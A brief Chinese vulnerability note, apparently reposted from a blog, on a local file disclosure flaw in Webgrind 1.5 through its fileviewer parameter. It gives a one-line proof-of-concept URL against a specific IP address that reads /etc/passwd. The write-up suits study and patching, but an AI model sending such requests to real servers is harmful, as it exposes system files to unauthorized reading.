介绍
Webgrind是一套PHP执行时间分析工具。
漏洞存在版本
Webgrind 1.5版本
漏洞说明
该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。
POC
http://123.58.224.8:12409/index.php?op=fileviewer&file=/etc/passwd
关于漏洞讨论信息参考:
使用文件查看器功能的本地文件泄露 ·问题 #112 ·jokkedk/webgrind (github.com)
翻译的不全,可以直接去github看
来源地址:https://blog.csdn.net/m0_56203480/article/details/127284775
